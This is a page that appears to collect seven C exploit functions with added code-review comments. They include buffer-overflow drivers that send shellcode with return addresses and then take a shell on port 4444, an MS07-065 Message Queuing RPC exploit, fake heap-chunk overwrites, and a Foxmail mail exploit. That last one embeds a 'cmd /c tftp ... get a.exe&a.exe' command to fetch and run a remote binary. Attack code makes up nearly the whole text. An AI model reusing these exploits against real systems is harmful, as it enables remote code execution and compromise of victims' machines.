Exemplo n.º 1
/*
 * Example 1: builds a fixed 1024-byte request, sends it to the host/port
 * given on the command line, sends one out-of-band byte, then hands the
 * connected socket to shell().
 *
 * Names not defined in this listing: Make_Connection, GetShellcode,
 * sh_Buff, sh_Len, RET, shell.  Anything said about them below is an
 * inference and marked as such.
 *
 * Returns -1 on usage/connect/send failure.  The success path falls off
 * the end of main() without a return statement, which yields 0 under C99.
 */
int main(int argc, char *argv[]) { 
    unsigned char Buff[1024];
    unsigned char data;

    unsigned long *ps;
    int s, i, k;          /* k is declared but never used */

    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }

    /* atoi() gives no error indication for a malformed port string. */
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    /* Only 0 is treated as failure; examples 2, 3 and 6 on this page test
     * s < 0 instead.  NOTE(review): if Make_Connection reports failure
     * as -1 this check misses it — confirm against its definition. */
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    GetShellcode();   /* presumably fills sh_Buff / sh_Len — not visible here */
    
    /* Fill Buff one unsigned long at a time.  The bound sizeof(Buff)/4
     * assumes sizeof(unsigned long) == 4; on an LP64 platform every store
     * is 8 bytes and the loop writes 2048 bytes into a 1024-byte array. */
    ps = (unsigned long *)Buff;
    for(i=0; i<sizeof(Buff)/4; i++)
    {
        *(ps++) = 0x60000000;
    }
    
    i = sh_Len % 4;    /* dead store: i is reassigned below before it is read */
    
    /* Copy sh_Buff into the tail of Buff.  There is no check that
     * sh_Len <= sizeof(Buff); a larger sh_Len makes the index wrap. */
    memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len);

    /* Overwrite the first 92 bytes with RET (same 4-byte-word assumption
     * as the fill loop above). */
    ps = (unsigned long *)Buff;
    for(i=0; i<92/4; i++)
    {
        *(ps++) = RET;
    }
    /* Off-by-one: index sizeof(Buff) is one past the end of the array, so
     * this store is out of bounds (undefined behaviour).  Example 4 on
     * this page writes Buff[sizeof(Buff) - 1] for the same purpose. */
    Buff[sizeof(Buff)] = 0;
    
    //PrintSc(Buff, sizeof(Buff));

    /* send() return value is only checked for <= 0; a short send is not
     * detected. */
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }

    /* One byte with flags == 1.  NOTE(review): the error text says "OOB",
     * and 1 is the value of MSG_OOB on common platforms; the named
     * constant would make that explicit. */
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    
    sleep (1);
    
    shell(s);    /* defined elsewhere; takes over the connected socket */
}
Exemplo n.º 2
/*
 * Example 2: local test harness.  Connects to 127.0.0.1:4444, reads the
 * local port of that connection back with getsockname(), appends it to
 * sh_Buff, lays JUMPESP and sh_Buff into a 1024-byte 0x90-filled buffer,
 * sends the buffer and hands the socket to shell().
 *
 * Names not defined in this listing: GetShellCode, sh_Buff, sh_Len,
 * Enc_key, JUMPESP, Make_Connection, shell.
 *
 * Returns 1 on the normal path; every failure path calls exit(1).
 */
int main()
{
    SOCKET  c,s;                  /* c is declared but never used */
    WSADATA WSAData;
    char Buff[1024];
    unsigned short port;
    struct sockaddr_in sa;
    int salen = sizeof(sa);

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    GetShellCode();
    if (!sh_Len)
    {
        printf("[-] Shellcode generate error.\n");
        exit(1);
    }

    s = Make_Connection("127.0.0.1", 4444, 10);
    /* NOTE(review): Winsock's SOCKET is an unsigned integer type, so
     * s < 0 can never be true; whether a failed connection is detected
     * here depends on what Make_Connection returns — confirm. */
    if(s<0)
    {
        printf("[-] connect error.\n");
        exit(1);
    }
    
    // get local port
    /* Return value unchecked: if getsockname() fails, sa.sin_port is read
     * uninitialised by the statements below. */
    getsockname(s, (struct sockaddr FAR *)&sa, &salen);
    
    /* Doubles Enc_key into its high byte (for an 8-bit key this gives the
     * key repeated in both bytes).  `port` is computed only for the
     * diagnostic printf; the memcpy below copies the unencoded sin_port. */
    Enc_key += Enc_key << 8;
    port = sa.sin_port^Enc_key;
    printf("port = %x %x\n", sa.sin_port, port);

    //memcpy(&sh_Buff[sh_Len], &port, 2);
    /* Appends the 2-byte port exactly as stored in the sockaddr (network
     * byte order).  sh_Buff needs at least sh_Len + 3 bytes of room for
     * this and the terminator that follows; its size is not visible here. */
    memcpy(&sh_Buff[sh_Len], &sa.sin_port, 2);

    sh_Buff[sh_Len+2] = 0;

    /* Only sizeof(Buff)-1 bytes are filled: Buff[1023] is never written
     * unless the strcpy below reaches it, yet all 1024 bytes are sent. */
    memset(Buff, 0x90, sizeof(Buff)-1);

    /* Unbounded copies: neither strlen(JUMPESP) nor strlen(sh_Buff) is
     * checked against the 964 bytes left after Buff+60.  strcpy also stops
     * at the first zero byte of sh_Buff, so sh_Buff is assumed NUL-free
     * up to the terminator written above. */
    strcpy(Buff+56, JUMPESP);
    strcpy(Buff+60, sh_Buff);

    send(s,Buff,sizeof(Buff),0);   /* return value ignored */
    Sleep(1000);

    shell(s);
    
    WSACleanup();
    return 1;
}
Exemplo n.º 3
/*
 * Example 3: sends a 1024-byte 0x90-filled buffer carrying JUMPESP at
 * offset 56 and `shellcode` at offset 60 to the host/port named on the
 * command line, then opens a second connection to port 4444 on the same
 * host and hands it to shell().
 *
 * Names not defined in this listing: JUMPESP, shellcode, Make_Connection,
 * shell.  Returns 1 on the normal path; failure paths call exit(1).
 */
int main(int argc, char *argv[])
{
    SOCKET  c,s;
    WSADATA WSAData;
    char Buff[1024];

    if (argc < 3)
    {
        /* Usage text has no trailing newline, unlike the other examples. */
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
        exit(1);
    }

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    /* sizeof(Buff)-1 bytes filled: the last byte stays uninitialised
     * unless the strcpy below reaches it, but the whole array is sent. */
    memset(Buff, 0x90, sizeof(Buff)-1);

    /* Unbounded strcpy: the lengths of JUMPESP and shellcode are not
     * checked against the 964 bytes available from Buff+60. */
    strcpy(Buff+56, JUMPESP);
    strcpy(Buff+60, shellcode);

    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    /* NOTE(review): SOCKET is unsigned on Winsock, so s < 0 is never
     * true; whether this detects anything depends on what
     * Make_Connection returns. */
    if(s<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }

    send(s,Buff,sizeof(Buff),0);   /* return value ignored */

    Sleep(1000);

    /* The second connection is used without any failure check, unlike
     * the first one above. */
    c = Make_Connection(argv[1], 4444, 10);
    shell(c);

    WSACleanup();
    return 1;
}
Exemplo n.º 4
/*
 * Example 4: variant of example 1.  Fills a 1024-byte buffer with 0x90,
 * places sh_Buff (copied as a C string) at the very end, overwrites the
 * first 128 bytes with RET, sends the buffer, sends one out-of-band byte
 * and hands the same socket to shell().
 *
 * Names not defined in this listing: Make_Connection, GetShellcode,
 * PrintSc, sh_Buff, sh_Len, RET, shell.
 *
 * Returns -1 on usage/connect/send failure; the success path falls off
 * the end of main(), which yields 0 under C99.
 */
int main(int argc, char *argv[]) { 
    unsigned char Buff[1024];
    unsigned char data;
    
    unsigned long *ps;
    int s, i;
    
    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }

    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    /* Only 0 is treated as failure (examples 2, 3 and 6 test s < 0).
     * NOTE(review): confirm which value Make_Connection returns on error. */
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }

    GetShellcode();
    PrintSc(sh_Buff, sh_Len);    /* diagnostic dump, defined elsewhere */

    memset(Buff, 0x90, sizeof(Buff));
    /* If strlen(sh_Buff) == sh_Len, strcpy writes sh_Len + 1 bytes
     * (terminator included) ending exactly at Buff[1023].  Requires
     * sh_Len + 1 <= sizeof(Buff) and a zero-free sh_Buff; neither is
     * checked here, and a larger sh_Len moves the destination before
     * the array. */
    strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff);

    /* First 128 bytes := RET, one unsigned long per store.  Assumes
     * sizeof(unsigned long) == 4; with 8-byte longs this covers 256 bytes
     * with a different byte layout. */
    ps = (unsigned long *)Buff;
    for(i=0; i<128/4; i++)
    {
        *(ps++) = RET;
    }
    /* Last valid index: the in-bounds form of the terminator store that
     * example 1 gets wrong. */
    Buff[sizeof(Buff) - 1] = 0;
    
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }

    /* flags == 1; the error text below calls this OOB data and 1 is
     * MSG_OOB on common platforms — the named constant would be clearer. */
    data='I';
    i = send(s, &data, 1, 1);
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }

    sleep (1);

    // get shell use same socket
    shell(s);
    
}
Exemplo n.º 5
/*
 * Example 5: command-line driver (see the banner strings for what it
 * targets).  Parses -h host, -p port and -n name, widens `name` to
 * 16-bit characters, assembles request_1 from three fragments and — if
 * execution got that far — would send bind_str, request_1, a filler and
 * request_2.  An unconditional exit(1) placed after the assembly stops
 * the program before anything is sent; see the comment at that line.
 *
 * Names not defined in this listing: usage, request_1a, request_1b,
 * request_1c, request_1, request_2, bind_str, Make_Connection,
 * Disconnect.
 *
 * Returns 0 only on the (currently unreachable) normal path; usage and
 * failure paths exit(1).
 */
int
main (int argc, char *argv[])
{

  unsigned char *target = NULL;
  unsigned char *name = NULL;
  int port = 2103;

  int i, j, len, len2;      /* len2 is never used */

  int ret;
  char buffer[6000] = { 0 };
  SOCKET s;
  WSADATA WSAData;

  printf("--------------------------------------------------------------------------\n");
  printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
  printf("-== code by axis@ph4nt0m ==-\n");
  printf("-== Http://www.ph4nt0m.org ==-\n");
  printf("-== Tested against Windows 2000 server SP4 ==-\n");
  printf
    ("--------------------------------------------------------------------------\n\n");

  /* usage() presumably does not return (otherwise the loop below would
   * run with too few arguments) — its body is not visible here. */
  if (argc < 5)
    usage (argv[0]);		//Handle parameters
  /* Every option consumes argv[i + 1] without checking i + 1 < argc: an
   * option given as the last argument reads argv[argc], which is NULL,
   * and strcmp()/atoi() on NULL is undefined behaviour. */
  for (i = 1; i < argc; i++)
    {
      if ((argv[i][0] == '-'))
	{
	  switch (argv[i][1])
	    {
	    case 'h':
	      target = (unsigned char *) argv[i + 1];
	      break;
	    case 'p':
	      if (strcmp (argv[i + 1], "2103") == 0)
		{
		  printf ("[+] Attacking default port 2103\n");
		}
	      else
		{
		  port = atoi (argv[i + 1]);
		}
	      break;
	    case 'n':
	      name = (unsigned char *) argv[i + 1];
	      break;
	    default:
	      printf ("[-] Invalid argument: %s\n", argv[i]);
	      usage (argv[0]);
	      break;
	    }
	  i++;
	}
      else
	usage (argv[0]);
    }


  /* name stays NULL when -n is absent, making strlen(name) undefined.
   * The allocation is exactly 2 * strlen(name) bytes: enough for the
   * widened form built below, but with no room for a terminator. */
  request_1b = malloc (sizeof (char) * (strlen (name) * 2));

  if (request_1b == NULL)
    {
      printf ("Allocation Error\n");
      exit (1);
    }


  /* Dead work: the loop below overwrites every byte this copies.  For an
   * empty name it also writes one byte into a zero-size allocation. */
  strcpy (request_1b, name);


  /* Interleaves a zero byte after each character of name (8-bit to
   * 16-bit widening).  strlen(name) is re-evaluated on every iteration. */
  for (i = 0, j = 0; j < (strlen (name) * 2); j++)
    {
      if (!(j % 2))
	{
	  *(request_1b + j) = *(name + i);
	}
      else
	{
	  *(request_1b + j) = '\x00';
	  i++;
	}
    }





/********************** attack payload ***************************/
  if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
    {
      fprintf (stderr, "[-] WSAStartup failed.\n");
      WSACleanup ();
      exit (1);
    }


  Sleep (1200);    /* no visible reason for the delay before connecting */


  /* target is NULL when -h was not given; Make_Connection's handling of
   * that is not visible here. */
  s = Make_Connection ((char *) target, port, 10);
  /* NOTE(review): SOCKET is an unsigned type on Winsock, so s < 0 is
   * never true; effectiveness depends on what Make_Connection returns. */
  if (s < 0)
    {
      fprintf (stderr, "[-] connect err.\n");
      exit (1);
    }

  //Send our evil Payload              
  printf ("[*]Sending our Payload, Good Luck! ^_^\n");

  printf ("[*]Sending RPC Bind String!\n");

  /* sizeof(bind_str) is the byte count only if bind_str is declared as an
   * array; for a pointer it is the pointer size.  Declaration not
   * visible here.  Return value ignored. */
  send (s, bind_str, sizeof (bind_str), 0);


  Sleep (1000);

  printf ("[*]Sending RPC Request Now!\n");

  /* Matches the three memcpy lengths below: 56 + widened name + 640. */
  len = 56 + (strlen (name) * 2) + 640;

  request_1 = calloc (len, sizeof (char));

  if (request_1 == NULL)
  {
    printf ("Allocation Error\n");
    exit (1);
  }

  memcpy (request_1, request_1a, 56);
  memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
  memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);


  /* Unconditional: every statement from here to the return is
   * unreachable.  As listed, the program exits with status 1 right after
   * assembling request_1 and never sends it.  Looks like a leftover
   * debugging stop. */
  exit(1);

  memset (buffer, '\x41', sizeof (buffer));	// fill the buffer to trigger seh
  /* sizeof(request_1) is the size of the pointer assigned from calloc
   * above, not len. */
  send (s, request_1, sizeof (request_1), 0);
  send (s, buffer, 5104, 0);	// fill the buffer to trigger seh
  send (s, request_2, sizeof (request_2), 0);	/* same sizeof caveat if request_2 is a pointer */


  Sleep (100);

  /* sizeof(buffer) - 1 leaves the final zero byte as a terminator;
   * ret is never examined. */
  memset (buffer, 0, sizeof (buffer));
  ret = recv (s, buffer, sizeof (buffer) - 1, 0);
  //printf("recv: %s\n", buffer);

  Disconnect (s);    /* request_1 / request_1b are never freed */

  return 0;
}
Exemplo n.º 6
/*
 * Example 6: sends an 8 KiB (0x2000) buffer to the host/port named on
 * the command line, then connects to `bindport` (argv[3], default 4444)
 * on the same host and hands that socket to shell().  The buffer holds
 * sh_Buff at offset 0, 'A' elsewhere, and three HEAP_FREE_ENTRY-shaped
 * records written at OFFSET, OFFSET-64 and OFFSET-32.
 *
 * Names not defined in this listing: GetShellCode, sh_Buff, sh_Len,
 * Enc_key, OFFSET, PHEAP_FREE_ENTRY, HEAP_ENTRY_SETTABLE_FLAG2,
 * HEAP_ENTRY_BUSY, FastPebLockRoutine, WriteSpace, Make_Connection,
 * shell.
 *
 * Returns 1 on the normal path; failure paths call exit(1).
 */
int main(int argc, char *argv[])
{
    unsigned char  Buff[0x2000];
    unsigned char  data;               /* unused */
    unsigned short bindport;

    SOCKET  c,s;
    WSADATA WSAData;
    unsigned short port;               /* port, sa, salen, l, j, k: unused */
    struct sockaddr_in sa;
    int salen = sizeof(sa);
    int l,i,j,k;
    PHEAP_FREE_ENTRY pFakeEntry1;
    PHEAP_FREE_ENTRY pFakeEntry2;
    PHEAP_FREE_ENTRY pFakeEntry3;

    if (argc < 3)
    {
        /* Usage text lists bind_port, but only two arguments are required. */
        fprintf(stderr, "Usage: %s remote_addr remote_port bind_port", argv[0]);
        exit(1);
    }

    if (argc > 3)
    {
        bindport = atoi(argv[3]);      /* no range check; atoi reports no errors */
    }
    else
    {
        bindport = 4444;
    }

    GetShellCode();
    if (sh_Len == 0)
    {
        fprintf(stderr, "Generate shellcode failed!\n");
        exit(1);
    }

    /* Enc_key is doubled into its high byte (an 8-bit key becomes the
     * same byte twice); bindport is XORed with it, 2 bytes are stored at
     * sh_Buff[sh_Len-4], then XORed back so the plain value is used for
     * the connect below.  sh_Len == 0 is rejected above, but 1..3 is not
     * and would make the index negative. */
    Enc_key  += Enc_key << 8;
    bindport ^= Enc_key;    
    memcpy(&sh_Buff[sh_Len-4], &bindport, 2);
    bindport ^= Enc_key;

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }

    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    /* NOTE(review): SOCKET is unsigned on Winsock, so s < 0 (and c < 0
     * below) can never be true; what this detects depends on what
     * Make_Connection returns. */
    if(s<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }

    // Construct Buff
    /* No check that sh_Len <= sizeof(Buff). */
    memset(Buff, 'A', sizeof(Buff));
    memcpy(Buff, sh_Buff, sh_Len);

    // buf2
    /* Struct overlays on a byte buffer.  Requires OFFSET >= 64 for the
     * two records below and OFFSET + sizeof(*pFakeEntry1) <= sizeof(Buff);
     * OFFSET is defined elsewhere.  NOTE(review): writing through a
     * struct pointer cast from a char array relies on Buff being
     * suitably aligned — not guaranteed by the language.
     * (Indentation of the field stores below mixes tabs and spaces.) */
    pFakeEntry1                 = (PHEAP_FREE_ENTRY)&Buff[OFFSET];
	pFakeEntry1->PreviousSize   = 0x8;
	pFakeEntry1->Size           = 0x2;
	pFakeEntry1->SegmentIndex   = 0x31;
	pFakeEntry1->Flags          = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY;
	pFakeEntry1->Index          = 0x0;
	pFakeEntry1->Mask           = 0x0;

    // fakechunk1
    pFakeEntry2                 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-64];
	pFakeEntry2->PreviousSize   = 0x2;
	pFakeEntry2->Size           = 0x2;
	pFakeEntry2->SegmentIndex   = 0x31;
	pFakeEntry2->Flags          = HEAP_ENTRY_SETTABLE_FLAG2;
	pFakeEntry2->Index          = 0x1;
	pFakeEntry2->Mask           = 0x1;
	/* FastPebLockRoutine and WriteSpace are defined outside this listing. */
	pFakeEntry2->FreeList.Flink = (LIST_ENTRY*)FastPebLockRoutine;
	pFakeEntry2->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
	
	// fakechunk2
    pFakeEntry3                 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-32];
	pFakeEntry3->PreviousSize   = 0x2;
	pFakeEntry3->Size           = 0x2;
	pFakeEntry3->SegmentIndex   = 0x31;
	pFakeEntry3->Flags          = HEAP_ENTRY_SETTABLE_FLAG2;
	pFakeEntry3->Index          = 0x1;
	pFakeEntry3->Mask           = 0x1;
	pFakeEntry3->FreeList.Flink = (LIST_ENTRY*)0x902BD0C2;  // RETN 2BD0
	pFakeEntry3->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
	
    i = send(s,Buff,sizeof(Buff),0);   /* i is assigned but never checked */

    Sleep(1000);

    c = Make_Connection(argv[1], bindport, 10);
    if(c<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }

    shell(c);

    WSACleanup();
    return 1;
}
Exemplo n.º 7
/*
 * Drives one SMTP session against `smtpserver` on SMTPPORT (defined
 * elsewhere): HELO, MAIL FROM, RCPT TO <mailaddr>, DATA, then a single
 * message produced from the `packet` template (defined elsewhere) with a
 * 510-byte field built from `shellcode` plus a tftp command naming `tftp`.
 *
 * @param mailaddr   recipient address; inserted unbounded into a 500-byte
 *                   temporary by sprintf below
 * @param tftp       host string substituted into the command template
 * @param smtpserver SMTP host handed to Make_Connection
 * @param shellcode  prefix of the command string; see the format-string
 *                   caveat at the sprintf(tmp1, tmp, tftp) line
 * @return 0 after the session; every failure path calls exit(1) without
 *         closing the socket.
 *
 * Notes on how this client handles data from the server (a malicious or
 * compromised SMTP peer can exploit the client itself):
 *   - every recv() asks for 4096 bytes into the 510-byte `buf`, so a
 *     reply longer than 510 bytes overflows the stack frame;
 *   - every reply is printed with printf(buf), i.e. with a format string
 *     chosen by the remote server; printf("%s", buf) or fputs() would
 *     not have that property.
 */
//send magic mail
int  SendXMail(    char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET  csock;
    int     ret,i=0;               /* i is never used */
    /* sbuf is 64 KiB of automatic storage; buf is 510 bytes. */
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    csock = Make_Connection(smtpserver, SMTPPORT, 10);
    /* NOTE(review): SOCKET is unsigned on Winsock, so csock < 0 is never
     * true; depends on what Make_Connection returns. */
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    memset(buf, 0, sizeof(buf));
    /* 4096 > sizeof(buf): a long server greeting overruns buf (same at
     * every recv() below). */
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);    /* server-controlled format string (repeated below) */

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);    /* see first recv() above */
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    ret=send(csock, "MAIL FROM: [email protected]\r\n",strlen("MAIL FROM: [email protected]\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);    /* see first recv() above */
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    
    /* tmp is 500 bytes; mailaddr length is not checked. */
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);    /* see first recv() above */
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    Sleep(1000);
    
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);    /* see first recv() above */
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));
    /* buf[0..508] = 0x41; buf[509] stays 0 as the terminator. */
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    /* Unbounded strcpy/strcat into the 500-byte tmp.  The result is then
     * used as the *format string* of the sprintf below, so any '%' in
     * shellcode is interpreted as a conversion; tmp1 (500 bytes) is not
     * length-checked either. */
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
    sprintf(tmp1, tmp, tftp);
    /* Right-aligns tmp1 to end at buf+0x100; if strlen(tmp1) > 0x100 the
     * destination pointer lies before buf. */
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    /* Four 32-bit stores at 0x100/0x104/0x108/0x110; offset 0x10C keeps
     * the 0x41 fill.  Writing through (int *) into a char array is not
     * guaranteed aligned or alias-safe by the standard. */
    *(int *)(buf+0x100)=0x7ffa54cd;  //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb;  //jmp back
    *(int *)(buf+0x108)=0x7ffdf220;  //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220;  //writeable addr
    memcpy(buf, "girl\x0d", 5);    /* overwrites the first 5 bytes of buf */
    /* packet (defined elsewhere) is the format; buf is inserted as a
     * string, bounded by the terminator at buf[509].  sbuf's 64 KiB is
     * assumed large enough for the expanded template — not checked. */
    sprintf(sbuf, (char *)packet, buf);

    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);    /* see first recv() above */
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock);    /* only reached on the success path */
    return 0;
}